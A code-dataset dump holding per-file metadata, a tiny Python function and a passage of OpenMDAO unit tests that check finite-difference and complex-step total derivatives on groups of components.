| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 1
| 0
|
0
| 9
|
29ecdbd9c7b1405a5c8810bef6b6a28ca5c1ddb0
| 38
|
py
|
Python
|
samples/src/main/resources/datasets/python/22.py
|
sritchie/kotlingrad
|
8165ed1cd77220a5347c58cded4c6f2bcf22ee30
|
[
"Apache-2.0"
] | 11
|
2020-12-19T01:19:44.000Z
|
2021-12-25T20:43:33.000Z
|
src/main/resources/datasets/python/22.py
|
breandan/katholic
|
081c39f3acc73ff41f5865563debe78a36e1038f
|
[
"Apache-2.0"
] | null | null | null |
src/main/resources/datasets/python/22.py
|
breandan/katholic
|
081c39f3acc73ff41f5865563debe78a36e1038f
|
[
"Apache-2.0"
] | 2
|
2021-01-25T07:59:20.000Z
|
2021-08-07T07:13:49.000Z
|
def power5():
return 2 ** (3 + 4)
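# (Despite the name, the exponent is 3 + 4 = 7, so this returns 2 ** 7 == 128.)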
| 12.666667
| 23
| 0.473684
| 6
| 38
| 3
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.153846
| 0.315789
| 38
| 2
| 24
| 19
| 0.538462
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.5
| true
| 0
| 0
| 0.5
| 1
| 0
| 1
| 1
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 0
| 1
| 1
| 0
|
0
| 7
|
d99bc323ca600b17e764c74a4970822b89054bfa
| 90,564
|
py
|
Python
|
openmdao/core/tests/test_approx_derivs.py
|
jbergeson/OpenMDAO
|
50df8f5888c6499a0ef66b836ee63b122a50aaae
|
[
"Apache-2.0"
] | null | null | null |
openmdao/core/tests/test_approx_derivs.py
|
jbergeson/OpenMDAO
|
50df8f5888c6499a0ef66b836ee63b122a50aaae
|
[
"Apache-2.0"
] | 1
|
2018-06-18T15:09:10.000Z
|
2018-06-18T15:09:10.000Z
|
openmdao/core/tests/test_approx_derivs.py
|
bbrelje/OpenMDAO
|
58f9ff47197531f4fb4ef632c6bcca11e799ccf0
|
[
"Apache-2.0"
] | null | null | null |
""" Testing for group finite differencing."""
import itertools
import unittest
try:
from parameterized import parameterized
except ImportError:
from openmdao.utils.assert_utils import SkipParameterized as parameterized
import numpy as np
import openmdao.api as om
from openmdao.test_suite.components.impl_comp_array import TestImplCompArray, TestImplCompArrayDense
from openmdao.test_suite.components.paraboloid import Paraboloid
from openmdao.test_suite.components.sellar import SellarDis1withDerivatives, \
SellarDis2withDerivatives, SellarDis1CS, SellarDis2CS
from openmdao.test_suite.components.simple_comps import DoubleArrayComp
from openmdao.test_suite.components.unit_conv import SrcComp, TgtCompC, TgtCompF, TgtCompK
from openmdao.test_suite.groups.parallel_groups import FanInSubbedIDVC
from openmdao.test_suite.parametric_suite import parametric_suite
from openmdao.utils.assert_utils import assert_near_equal
from openmdao.utils.general_utils import set_pyoptsparse_opt
from openmdao.utils.mpi import MPI
import time
try:
from openmdao.parallel_api import PETScVector
vector_class = PETScVector
except ImportError:
vector_class = om.DefaultVector
PETScVector = None
# check that pyoptsparse is installed
# if it is, try to use SNOPT but fall back to SLSQP
OPT, OPTIMIZER = set_pyoptsparse_opt('SNOPT')
if OPTIMIZER:
from openmdao.drivers.pyoptsparse_driver import pyOptSparseDriver
class TestGroupFiniteDifference(unittest.TestCase):
def test_paraboloid(self):
prob = om.Problem()
model = prob.model
model.add_subsystem('p1', om.IndepVarComp('x', 0.0), promotes=['x'])
model.add_subsystem('p2', om.IndepVarComp('y', 0.0), promotes=['y'])
model.add_subsystem('comp', Paraboloid(), promotes=['x', 'y', 'f_xy'])
model.linear_solver = om.ScipyKrylov()
model.approx_totals()
prob.setup(check=False, mode='fwd')
prob.set_solver_print(level=0)
prob.run_model()
of = ['f_xy']
wrt = ['x', 'y']
derivs = prob.compute_totals(of=of, wrt=wrt)
assert_near_equal(derivs['f_xy', 'x'], [[-6.0]], 1e-6)
assert_near_equal(derivs['f_xy', 'y'], [[8.0]], 1e-6)
# 1 output x 2 inputs
self.assertEqual(len(model._approx_schemes['fd']._exec_dict), 2)
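# The test above is the whole group-FD recipe in miniature: approx_totals()
# marks the group, and compute_totals() then finite-differences across it
# instead of chaining analytic partials. Condensed (names as in this file):
#     model.approx_totals()                 # FD the entire model group
#     prob.setup(check=False, mode='fwd')
#     prob.run_model()
#     J = prob.compute_totals(of=['f_xy'], wrt=['x', 'y'])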
def test_fd_count(self):
# Make sure we aren't doing extra FD steps.
class ParaboloidA(om.ExplicitComponent):
def setup(self):
self.add_input('x', val=0.0)
self.add_input('y', val=0.0)
self.add_output('f_xy', val=0.0)
self.add_output('g_xy', val=0.0)
# makes extra calls to the model with no actual steps
self.declare_partials(of='*', wrt='*', method='fd', form='forward', step=1e-6)
self.count = 0
def compute(self, inputs, outputs):
x = inputs['x']
y = inputs['y']
outputs['f_xy'] = (x-3.0)**2 + x*y + (y+4.0)**2 - 3.0
g_xy = (x-3.0)**2 + x*y + (y+4.0)**2 - 3.0
outputs['g_xy'] = g_xy * 3
self.count += 1
prob = om.Problem()
model = prob.model
model.add_subsystem('px', om.IndepVarComp('x', val=3.0))
model.add_subsystem('py', om.IndepVarComp('y', val=5.0))
model.add_subsystem('parab', ParaboloidA())
model.connect('px.x', 'parab.x')
model.connect('py.y', 'parab.y')
model.add_design_var('px.x', lower=-50, upper=50)
model.add_design_var('py.y', lower=-50, upper=50)
model.add_objective('parab.f_xy')
prob.setup()
prob.run_model()
J = prob.compute_totals(of=['parab.f_xy'], wrt=['px.x', 'py.y'])
# print(J)
# 1. run_model; 2. step x; 3. step y
self.assertEqual(model.parab.count, 3)
self.assertEqual(model.parab.iter_count_without_approx, 1)
self.assertEqual(model.parab.iter_count, 1)
self.assertEqual(model.parab.iter_count_apply, 2)
def test_fd_count_driver(self):
# Make sure we aren't doing FD wrt any var that isn't in the driver desvar set.
class ParaboloidA(om.ExplicitComponent):
def setup(self):
self.add_input('x', val=0.0)
self.add_input('y', val=0.0)
self.add_output('f_xy', val=0.0)
self.add_output('g_xy', val=0.0)
self.count = 0
def compute(self, inputs, outputs):
x = inputs['x']
y = inputs['y']
outputs['f_xy'] = (x-3.0)**2 + x*y + (y+4.0)**2 - 3.0
g_xy = (x-3.0)**2 + x*y + (y+4.0)**2 - 3.0
outputs['g_xy'] = g_xy * 3
self.count += 1
prob = om.Problem()
model = prob.model
model.add_subsystem('px', om.IndepVarComp('x', val=3.0))
model.add_subsystem('py', om.IndepVarComp('y', val=5.0))
model.add_subsystem('parab', ParaboloidA())
model.connect('px.x', 'parab.x')
model.connect('py.y', 'parab.y')
model.add_design_var('px.x', lower=-50, upper=50)
model.add_objective('parab.f_xy')
model.approx_totals(method='fd')
prob.setup()
prob.run_model()
prob.driver._compute_totals(of=['parab.f_xy'], wrt=['px.x'], use_abs_names=True)
# 1. run_model; 2. step x
self.assertEqual(model.parab.count, 2)
def test_paraboloid_subbed(self):
prob = om.Problem()
model = prob.model
model.add_subsystem('p1', om.IndepVarComp('x', 0.0), promotes=['x'])
model.add_subsystem('p2', om.IndepVarComp('y', 0.0), promotes=['y'])
sub = model.add_subsystem('sub', om.Group(), promotes=['x', 'y', 'f_xy'])
sub.add_subsystem('comp', Paraboloid(), promotes=['x', 'y', 'f_xy'])
model.linear_solver = om.ScipyKrylov()
sub.approx_totals()
prob.setup(check=False, mode='fwd')
prob.set_solver_print(level=0)
prob.run_model()
of = ['f_xy']
wrt = ['x', 'y']
derivs = prob.compute_totals(of=of, wrt=wrt)
assert_near_equal(derivs['f_xy', 'x'], [[-6.0]], 1e-6)
assert_near_equal(derivs['f_xy', 'y'], [[8.0]], 1e-6)
Jfd = sub._jacobian
assert_near_equal(Jfd['sub.comp.f_xy', 'sub.comp.x'], [[-6.0]], 1e-6)
assert_near_equal(Jfd['sub.comp.f_xy', 'sub.comp.y'], [[8.0]], 1e-6)
# 1 output x 2 inputs
self.assertEqual(len(sub._approx_schemes['fd']._exec_dict), 2)
def test_paraboloid_subbed_in_setup(self):
class MyModel(om.Group):
def setup(self):
self.add_subsystem('comp', Paraboloid(), promotes=['x', 'y', 'f_xy'])
self.approx_totals()
prob = om.Problem()
model = prob.model
model.add_subsystem('p1', om.IndepVarComp('x', 0.0), promotes=['x'])
model.add_subsystem('p2', om.IndepVarComp('y', 0.0), promotes=['y'])
sub = model.add_subsystem('sub', MyModel(), promotes=['x', 'y', 'f_xy'])
model.linear_solver = om.ScipyKrylov()
prob.setup(check=False, mode='fwd')
prob.set_solver_print(level=0)
prob.run_model()
of = ['f_xy']
wrt = ['x', 'y']
derivs = prob.compute_totals(of=of, wrt=wrt)
assert_near_equal(derivs['f_xy', 'x'], [[-6.0]], 1e-6)
assert_near_equal(derivs['f_xy', 'y'], [[8.0]], 1e-6)
Jfd = sub._jacobian
assert_near_equal(Jfd['sub.comp.f_xy', 'sub.comp.x'], [[-6.0]], 1e-6)
assert_near_equal(Jfd['sub.comp.f_xy', 'sub.comp.y'], [[8.0]], 1e-6)
# 1 output x 2 inputs
self.assertEqual(len(sub._approx_schemes['fd']._exec_dict), 2)
def test_paraboloid_subbed_with_connections(self):
prob = om.Problem()
model = prob.model
model.add_subsystem('p1', om.IndepVarComp('x', 0.0))
model.add_subsystem('p2', om.IndepVarComp('y', 0.0))
sub = model.add_subsystem('sub', om.Group())
sub.add_subsystem('bx', om.ExecComp('xout = xin'))
sub.add_subsystem('by', om.ExecComp('yout = yin'))
sub.add_subsystem('comp', Paraboloid())
model.connect('p1.x', 'sub.bx.xin')
model.connect('sub.bx.xout', 'sub.comp.x')
model.connect('p2.y', 'sub.by.yin')
model.connect('sub.by.yout', 'sub.comp.y')
model.linear_solver = om.ScipyKrylov()
sub.approx_totals()
prob.setup(check=False, mode='fwd')
prob.set_solver_print(level=0)
prob.run_model()
of = ['sub.comp.f_xy']
wrt = ['p1.x', 'p2.y']
derivs = prob.compute_totals(of=of, wrt=wrt)
assert_near_equal(derivs['sub.comp.f_xy', 'p1.x'], [[-6.0]], 1e-6)
assert_near_equal(derivs['sub.comp.f_xy', 'p2.y'], [[8.0]], 1e-6)
Jfd = sub._jacobian
assert_near_equal(Jfd['sub.comp.f_xy', 'sub.bx.xin'], [[-6.0]], 1e-6)
assert_near_equal(Jfd['sub.comp.f_xy', 'sub.by.yin'], [[8.0]], 1e-6)
# 3 outputs x 2 inputs
n_entries = 0
for k, v in sub._approx_schemes['fd']._exec_dict.items():
n_entries += len(v)
self.assertEqual(n_entries, 6)
def test_array_comp(self):
class DoubleArrayFD(DoubleArrayComp):
def compute_partials(self, inputs, partials):
"""
Override deriv calculation.
"""
pass
prob = om.Problem()
model = prob.model
model.add_subsystem('p1', om.IndepVarComp('x1', val=np.ones(2)))
model.add_subsystem('p2', om.IndepVarComp('x2', val=np.ones(2)))
comp = model.add_subsystem('comp', DoubleArrayFD())
model.connect('p1.x1', 'comp.x1')
model.connect('p2.x2', 'comp.x2')
model.linear_solver = om.ScipyKrylov()
model.approx_totals()
prob.setup()
prob.run_model()
model.run_linearize()
Jfd = model._jacobian
assert_near_equal(Jfd['comp.y1', 'p1.x1'], comp.JJ[0:2, 0:2], 1e-6)
assert_near_equal(Jfd['comp.y1', 'p2.x2'], comp.JJ[0:2, 2:4], 1e-6)
assert_near_equal(Jfd['comp.y2', 'p1.x1'], comp.JJ[2:4, 0:2], 1e-6)
assert_near_equal(Jfd['comp.y2', 'p2.x2'], comp.JJ[2:4, 2:4], 1e-6)
def test_implicit_component_fd(self):
# Somehow this wasn't tested in the original fd tests (which are mostly feature tests).
class TestImplCompArrayDense(TestImplCompArray):
def setup(self):
super().setup()
self.declare_partials('*', '*', method='fd')
prob = om.Problem()
model = prob.model
model.add_subsystem('p_rhs', om.IndepVarComp('rhs', val=np.ones(2)))
sub = model.add_subsystem('sub', om.Group())
comp = sub.add_subsystem('comp', TestImplCompArrayDense())
model.connect('p_rhs.rhs', 'sub.comp.rhs')
model.linear_solver = om.ScipyKrylov()
prob.setup()
prob.run_model()
model.run_linearize()
Jfd = comp._jacobian
assert_near_equal(Jfd['sub.comp.x', 'sub.comp.rhs'], -np.eye(2), 1e-6)
assert_near_equal(Jfd['sub.comp.x', 'sub.comp.x'], comp.mtx, 1e-6)
def test_around_newton(self):
# For a group that is set to FD that has a Newton solver, make sure it doesn't
# try to FD itself while solving.
class TestImplCompArrayDenseNoSolve(TestImplCompArrayDense):
def solve_nonlinear(self, inputs, outputs):
""" Disable local solve."""
pass
prob = om.Problem()
model = prob.model
model.add_subsystem('p_rhs', om.IndepVarComp('rhs', val=np.array([2, 4])))
model.add_subsystem('comp', TestImplCompArrayDenseNoSolve())
model.connect('p_rhs.rhs', 'comp.rhs')
model.nonlinear_solver = om.NewtonSolver(solve_subsystems=False)
model.linear_solver = om.ScipyKrylov()
model.approx_totals()
prob.setup()
prob.run_model()
model.approx_totals()
assert_near_equal(prob['comp.x'], [1.97959184, 4.02040816], 1e-5)
model.run_linearize()
of = ['comp.x']
wrt = ['p_rhs.rhs']
Jfd = prob.compute_totals(of=of, wrt=wrt)
assert_near_equal(Jfd['comp.x', 'p_rhs.rhs'],
[[1.01020408, -0.01020408], [-0.01020408, 1.01020408]], 1e-5)
def test_step_size(self):
# Test makes sure option metadata propagates to the fd function
prob = om.Problem()
model = prob.model
model.add_subsystem('p1', om.IndepVarComp('x', 0.0), promotes=['x'])
model.add_subsystem('p2', om.IndepVarComp('y', 0.0), promotes=['y'])
model.add_subsystem('comp', Paraboloid(), promotes=['x', 'y', 'f_xy'])
model.linear_solver = om.ScipyKrylov()
# Worse step so that our answer will be off a wee bit.
model.approx_totals(step=1e-2)
prob.setup(check=False, mode='fwd')
prob.set_solver_print(level=0)
prob.run_model()
of = ['f_xy']
wrt = ['x', 'y']
derivs = prob.compute_totals(of=of, wrt=wrt)
assert_near_equal(derivs['f_xy', 'x'], [[-5.99]], 1e-6)
assert_near_equal(derivs['f_xy', 'y'], [[8.01]], 1e-6)
def test_unit_conv_group(self):
prob = om.Problem()
prob.model.add_subsystem('px1', om.IndepVarComp('x1', 100.0), promotes=['x1'])
sub1 = prob.model.add_subsystem('sub1', om.Group())
sub2 = prob.model.add_subsystem('sub2', om.Group())
sub1.add_subsystem('src', SrcComp())
sub2.add_subsystem('tgtF', TgtCompF())
sub2.add_subsystem('tgtC', TgtCompC())
sub2.add_subsystem('tgtK', TgtCompK())
prob.model.connect('x1', 'sub1.src.x1')
prob.model.connect('sub1.src.x2', 'sub2.tgtF.x2')
prob.model.connect('sub1.src.x2', 'sub2.tgtC.x2')
prob.model.connect('sub1.src.x2', 'sub2.tgtK.x2')
sub2.approx_totals(method='fd')
prob.setup()
prob.run_model()
assert_near_equal(prob['sub1.src.x2'], 100.0, 1e-6)
assert_near_equal(prob['sub2.tgtF.x3'], 212.0, 1e-6)
assert_near_equal(prob['sub2.tgtC.x3'], 100.0, 1e-6)
assert_near_equal(prob['sub2.tgtK.x3'], 373.15, 1e-6)
wrt = ['x1']
of = ['sub2.tgtF.x3', 'sub2.tgtC.x3', 'sub2.tgtK.x3']
J = prob.compute_totals(of=of, wrt=wrt, return_format='dict')
assert_near_equal(J['sub2.tgtF.x3']['x1'][0][0], 1.8, 1e-6)
assert_near_equal(J['sub2.tgtC.x3']['x1'][0][0], 1.0, 1e-6)
assert_near_equal(J['sub2.tgtK.x3']['x1'][0][0], 1.0, 1e-6)
# Check the total derivatives in reverse mode
prob.setup(check=False, mode='rev')
prob.run_model()
J = prob.compute_totals(of=of, wrt=wrt, return_format='dict')
assert_near_equal(J['sub2.tgtF.x3']['x1'][0][0], 1.8, 1e-6)
assert_near_equal(J['sub2.tgtC.x3']['x1'][0][0], 1.0, 1e-6)
assert_near_equal(J['sub2.tgtK.x3']['x1'][0][0], 1.0, 1e-6)
def test_sellar(self):
# Basic sellar test.
prob = om.Problem()
model = prob.model
model.add_subsystem('px', om.IndepVarComp('x', 1.0), promotes=['x'])
model.add_subsystem('pz', om.IndepVarComp('z', np.array([5.0, 2.0])), promotes=['z'])
model.add_subsystem('d1', SellarDis1withDerivatives(), promotes=['x', 'z', 'y1', 'y2'])
model.add_subsystem('d2', SellarDis2withDerivatives(), promotes=['z', 'y1', 'y2'])
model.add_subsystem('obj_cmp', om.ExecComp('obj = x**2 + z[1] + y1 + exp(-y2)',
z=np.array([0.0, 0.0]), x=0.0),
promotes=['obj', 'x', 'z', 'y1', 'y2'])
model.add_subsystem('con_cmp1', om.ExecComp('con1 = 3.16 - y1'), promotes=['con1', 'y1'])
model.add_subsystem('con_cmp2', om.ExecComp('con2 = y2 - 24.0'), promotes=['con2', 'y2'])
prob.model.nonlinear_solver = om.NonlinearBlockGS()
model.approx_totals(method='fd', step=1e-5)
prob.setup()
prob.set_solver_print(level=0)
prob.run_model()
assert_near_equal(prob['y1'], 25.58830273, .00001)
assert_near_equal(prob['y2'], 12.05848819, .00001)
wrt = ['z']
of = ['obj']
J = prob.compute_totals(of=of, wrt=wrt, return_format='flat_dict')
assert_near_equal(J['obj', 'z'][0][0], 9.61001056, .00001)
assert_near_equal(J['obj', 'z'][0][1], 1.78448534, .00001)
def test_desvar_with_indices(self):
# Just desvars on this one to cover code missed by desvar+response test.
class ArrayComp2D(om.ExplicitComponent):
"""
A fairly simple array component.
"""
def setup(self):
self.JJ = np.array([[1.0, 3.0, -2.0, 7.0],
[6.0, 2.5, 2.0, 4.0],
[-1.0, 0.0, 8.0, 1.0],
[1.0, 4.0, -5.0, 6.0]])
# Params
self.add_input('x1', np.zeros([4]))
# Unknowns
self.add_output('y1', np.zeros([4]))
# Derivatives
self.declare_partials('*', '*')
def compute(self, inputs, outputs):
"""
Execution.
"""
outputs['y1'] = self.JJ.dot(inputs['x1'])
def compute_partials(self, inputs, partials):
"""
Analytical derivatives.
"""
partials[('y1', 'x1')] = self.JJ
prob = om.Problem()
model = prob.model
model.add_subsystem('x_param1', om.IndepVarComp('x1', np.ones((4))),
promotes=['x1'])
mycomp = model.add_subsystem('mycomp', ArrayComp2D(), promotes=['x1', 'y1'])
model.add_design_var('x1', indices=[1, 3])
model.add_constraint('y1')
prob.set_solver_print(level=0)
model.approx_totals(method='fd')
prob.setup(check=False, mode='fwd')
prob.run_model()
Jbase = mycomp.JJ
of = ['y1']
wrt = ['x1']
J = prob.compute_totals(of=of, wrt=wrt, return_format='flat_dict')
assert_near_equal(J['y1', 'x1'][0][0], Jbase[0, 1], 1e-8)
assert_near_equal(J['y1', 'x1'][0][1], Jbase[0, 3], 1e-8)
assert_near_equal(J['y1', 'x1'][2][0], Jbase[2, 1], 1e-8)
assert_near_equal(J['y1', 'x1'][2][1], Jbase[2, 3], 1e-8)
def test_desvar_and_response_with_indices(self):
class ArrayComp2D(om.ExplicitComponent):
"""
A fairly simple array component.
"""
def setup(self):
self.JJ = np.array([[1.0, 3.0, -2.0, 7.0],
[6.0, 2.5, 2.0, 4.0],
[-1.0, 0.0, 8.0, 1.0],
[1.0, 4.0, -5.0, 6.0]])
# Params
self.add_input('x1', np.zeros([4]))
# Unknowns
self.add_output('y1', np.zeros([4]))
self.declare_partials(of='*', wrt='*')
def compute(self, inputs, outputs):
"""
Execution.
"""
outputs['y1'] = self.JJ.dot(inputs['x1'])
def compute_partials(self, inputs, partials):
"""
Analytical derivatives.
"""
partials[('y1', 'x1')] = self.JJ
prob = om.Problem()
model = prob.model
model.add_subsystem('x_param1', om.IndepVarComp('x1', np.ones((4))),
promotes=['x1'])
mycomp = model.add_subsystem('mycomp', ArrayComp2D(), promotes=['x1', 'y1'])
model.add_design_var('x1', indices=[1, 3])
model.add_constraint('y1', indices=[0, 2])
prob.set_solver_print(level=0)
model.approx_totals(method='fd')
prob.setup(check=False, mode='fwd')
prob.run_model()
Jbase = mycomp.JJ
of = ['y1']
wrt = ['x1']
J = prob.compute_totals(of=of, wrt=wrt, return_format='flat_dict')
assert_near_equal(J['y1', 'x1'][0][0], Jbase[0, 1], 1e-8)
assert_near_equal(J['y1', 'x1'][0][1], Jbase[0, 3], 1e-8)
assert_near_equal(J['y1', 'x1'][1][0], Jbase[2, 1], 1e-8)
assert_near_equal(J['y1', 'x1'][1][1], Jbase[2, 3], 1e-8)
def test_full_model_fd(self):
class DontCall(om.LinearRunOnce):
def solve(self, vec_names, mode, rel_systems=None):
raise RuntimeError("This solver should be ignored!")
class Simple(om.ExplicitComponent):
def setup(self):
self.add_input('x', val=0.0)
self.add_output('y', val=0.0)
self.declare_partials('y', 'x')
def compute(self, inputs, outputs):
x = inputs['x']
outputs['y'] = 4.0*x
prob = om.Problem()
model = prob.model
model.add_subsystem('p1', om.IndepVarComp('x', 0.0), promotes=['x'])
model.add_subsystem('comp', Simple(), promotes=['x', 'y'])
model.linear_solver = DontCall()
model.approx_totals()
model.add_design_var('x')
model.add_objective('y')
prob.setup(check=False, mode='fwd')
prob.set_solver_print(level=0)
prob.run_model()
of = ['comp.y']
wrt = ['p1.x']
derivs = prob.driver._compute_totals(of=of, wrt=wrt, return_format='dict')
assert_near_equal(derivs['comp.y']['p1.x'], [[4.0]], 1e-6)
def test_newton_with_densejac_under_full_model_fd(self):
# Basic sellar test.
prob = om.Problem()
model = prob.model = om.Group(assembled_jac_type='dense')
model.add_subsystem('px', om.IndepVarComp('x', 1.0), promotes=['x'])
model.add_subsystem('pz', om.IndepVarComp('z', np.array([5.0, 2.0])), promotes=['z'])
sub = model.add_subsystem('sub', om.Group(), promotes=['*'])
sub.add_subsystem('d1', SellarDis1withDerivatives(), promotes=['x', 'z', 'y1', 'y2'])
sub.add_subsystem('d2', SellarDis2withDerivatives(), promotes=['z', 'y1', 'y2'])
model.add_subsystem('obj_cmp', om.ExecComp('obj = x**2 + z[1] + y1 + exp(-y2)',
z=np.array([0.0, 0.0]), x=0.0),
promotes=['obj', 'x', 'z', 'y1', 'y2'])
model.add_subsystem('con_cmp1', om.ExecComp('con1 = 3.16 - y1'), promotes=['con1', 'y1'])
model.add_subsystem('con_cmp2', om.ExecComp('con2 = y2 - 24.0'), promotes=['con2', 'y2'])
sub.nonlinear_solver = om.NewtonSolver(solve_subsystems=False)
sub.linear_solver = om.ScipyKrylov(assemble_jac=True)
model.approx_totals(method='fd', step=1e-5)
prob.setup()
prob.set_solver_print(level=0)
prob.run_model()
assert_near_equal(prob['y1'], 25.58830273, .00001)
assert_near_equal(prob['y2'], 12.05848819, .00001)
wrt = ['z']
of = ['obj']
J = prob.compute_totals(of=of, wrt=wrt, return_format='flat_dict')
assert_near_equal(J['obj', 'z'][0][0], 9.61001056, .00001)
assert_near_equal(J['obj', 'z'][0][1], 1.78448534, .00001)
def test_newton_with_cscjac_under_full_model_fd(self):
# Basic sellar test.
prob = om.Problem()
model = prob.model
sub = model.add_subsystem('sub', om.Group(), promotes=['*'])
model.add_subsystem('px', om.IndepVarComp('x', 1.0), promotes=['x'])
model.add_subsystem('pz', om.IndepVarComp('z', np.array([5.0, 2.0])), promotes=['z'])
sub.add_subsystem('d1', SellarDis1withDerivatives(), promotes=['x', 'z', 'y1', 'y2'])
sub.add_subsystem('d2', SellarDis2withDerivatives(), promotes=['z', 'y1', 'y2'])
model.add_subsystem('obj_cmp', om.ExecComp('obj = x**2 + z[1] + y1 + exp(-y2)',
z=np.array([0.0, 0.0]), x=0.0),
promotes=['obj', 'x', 'z', 'y1', 'y2'])
model.add_subsystem('con_cmp1', om.ExecComp('con1 = 3.16 - y1'), promotes=['con1', 'y1'])
model.add_subsystem('con_cmp2', om.ExecComp('con2 = y2 - 24.0'), promotes=['con2', 'y2'])
sub.nonlinear_solver = om.NewtonSolver(solve_subsystems=False)
sub.linear_solver = om.ScipyKrylov(assemble_jac=True)
model.approx_totals(method='fd', step=1e-5)
prob.setup()
prob.set_solver_print(level=0)
prob.run_model()
assert_near_equal(prob['y1'], 25.58830273, .00001)
assert_near_equal(prob['y2'], 12.05848819, .00001)
wrt = ['z']
of = ['obj']
J = prob.compute_totals(of=of, wrt=wrt, return_format='flat_dict')
assert_near_equal(J['obj', 'z'][0][0], 9.61001056, .00001)
assert_near_equal(J['obj', 'z'][0][1], 1.78448534, .00001)
def test_approx_totals_multi_input_constrained_desvar(self):
p = om.Problem()
indeps = p.model.add_subsystem('indeps', om.IndepVarComp(), promotes_outputs=['*'])
indeps.add_output('x', np.array([ 0.55994437, -0.95923447, 0.21798656, -0.02158783, 0.62183717,
0.04007379, 0.46044942, -0.10129622, 0.27720413, -0.37107886]))
indeps.add_output('y', np.array([ 0.52577864, 0.30894559, 0.8420792 , 0.35039912, -0.67290778,
-0.86236787, -0.97500023, 0.47739414, 0.51174103, 0.10052582]))
indeps.add_output('r', .7)
arctan_yox = om.ExecComp('g=arctan(y/x)', has_diag_partials=True,
g=np.ones(10), x=np.ones(10), y=np.ones(10))
p.model.add_subsystem('arctan_yox', arctan_yox)
p.model.add_subsystem('circle', om.ExecComp('area=pi*r**2'))
p.model.add_subsystem('r_con', om.ExecComp('g=x**2 + y**2 - r', has_diag_partials=True,
g=np.ones(10), x=np.ones(10), y=np.ones(10)))
p.model.connect('r', ('circle.r', 'r_con.r'))
p.model.connect('x', ['r_con.x', 'arctan_yox.x'])
p.model.connect('y', ['r_con.y', 'arctan_yox.y'])
p.model.approx_totals(method='cs')
p.model.add_design_var('x')
p.model.add_design_var('y')
p.model.add_design_var('r', lower=.5, upper=10)
p.model.add_constraint('y', equals=0, indices=[0,])
p.model.add_objective('circle.area', ref=-1)
p.setup(derivatives=True)
p.run_model()
# Formerly a KeyError
derivs = p.check_totals(compact_print=True, out_stream=None)
assert_near_equal(0.0, derivs['indeps.y', 'indeps.x']['abs error'][0])
# Coverage
derivs = p.driver._compute_totals(return_format='dict')
assert_near_equal(np.zeros((1, 10)), derivs['indeps.y']['indeps.x'])
def test_opt_with_linear_constraint(self):
# Test for a bug where we weren't re-initializing things in between computing
# totals on the linear constraints and the nonlinear ones.
if OPT is None:
raise unittest.SkipTest("pyoptsparse is not installed")
if OPTIMIZER is None:
raise unittest.SkipTest("pyoptsparse is not providing SNOPT or SLSQP")
p = om.Problem()
indeps = p.model.add_subsystem('indeps', om.IndepVarComp(), promotes_outputs=['*'])
indeps.add_output('x', np.array([ 0.55994437, -0.95923447, 0.21798656, -0.02158783, 0.62183717,
0.04007379, 0.46044942, -0.10129622, 0.27720413, -0.37107886]))
indeps.add_output('y', np.array([ 0.52577864, 0.30894559, 0.8420792 , 0.35039912, -0.67290778,
-0.86236787, -0.97500023, 0.47739414, 0.51174103, 0.10052582]))
indeps.add_output('r', .7)
arctan_yox = om.ExecComp('g=arctan(y/x)', has_diag_partials=True,
g=np.ones(10), x=np.ones(10), y=np.ones(10))
p.model.add_subsystem('arctan_yox', arctan_yox)
p.model.add_subsystem('circle', om.ExecComp('area=pi*r**2'))
p.model.add_subsystem('r_con', om.ExecComp('g=x**2 + y**2 - r', has_diag_partials=True,
g=np.ones(10), x=np.ones(10), y=np.ones(10)))
thetas = np.linspace(0, np.pi/4, 10)
p.model.add_subsystem('theta_con', om.ExecComp('g = x - theta', has_diag_partials=True,
g=np.ones(10), x=np.ones(10),
theta=thetas))
p.model.add_subsystem('delta_theta_con', om.ExecComp('g = even - odd', has_diag_partials=True,
g=np.ones(10//2), even=np.ones(10//2),
odd=np.ones(10//2)))
p.model.add_subsystem('l_conx', om.ExecComp('g=x-1', has_diag_partials=True, g=np.ones(10), x=np.ones(10)))
IND = np.arange(10, dtype=int)
ODD_IND = IND[1::2] # all odd indices
EVEN_IND = IND[0::2] # all even indices
p.model.connect('r', ('circle.r', 'r_con.r'))
p.model.connect('x', ['r_con.x', 'arctan_yox.x', 'l_conx.x'])
p.model.connect('y', ['r_con.y', 'arctan_yox.y'])
p.model.connect('arctan_yox.g', 'theta_con.x')
p.model.connect('arctan_yox.g', 'delta_theta_con.even', src_indices=EVEN_IND)
p.model.connect('arctan_yox.g', 'delta_theta_con.odd', src_indices=ODD_IND)
p.driver = pyOptSparseDriver()
p.driver.options['print_results'] = False
p.model.approx_totals(method='fd')
p.model.add_design_var('x')
p.model.add_design_var('y')
p.model.add_design_var('r', lower=.5, upper=10)
# nonlinear constraints
p.model.add_constraint('r_con.g', equals=0)
p.model.add_constraint('theta_con.g', lower=-1e-5, upper=1e-5, indices=EVEN_IND)
p.model.add_constraint('delta_theta_con.g', lower=-1e-5, upper=1e-5)
p.model.add_constraint('l_conx.g', equals=0, linear=False, indices=[0,])
p.model.add_constraint('y', equals=0, indices=[0,], linear=True)
p.model.add_objective('circle.area', ref=-1)
p.setup(mode='fwd', derivatives=True)
p.run_driver()
assert_near_equal(p['circle.area'], np.pi, 1e-6)
def test_bug_subsolve(self):
# There was a bug where a group with an approximation was still performing a linear
# solve on its subsystems, which let partials declared with 'val' corrupt the
# results. (A standalone sketch of this pattern follows this test class.)
class DistParab(om.ExplicitComponent):
def initialize(self):
self.options.declare('arr_size', types=int, default=10,
desc="Size of input and output vectors.")
def setup(self):
arr_size = self.options['arr_size']
self.add_input('x', val=np.ones(arr_size))
self.add_output('f_xy', val=np.ones(arr_size))
self.declare_partials('f_xy', 'x')
def compute(self, inputs, outputs):
x = inputs['x']
outputs['f_xy'] = x**2
class NonDistComp(om.ExplicitComponent):
def initialize(self):
self.options.declare('arr_size', types=int, default=10,
desc="Size of input and output vectors.")
def setup(self):
arr_size = self.options['arr_size']
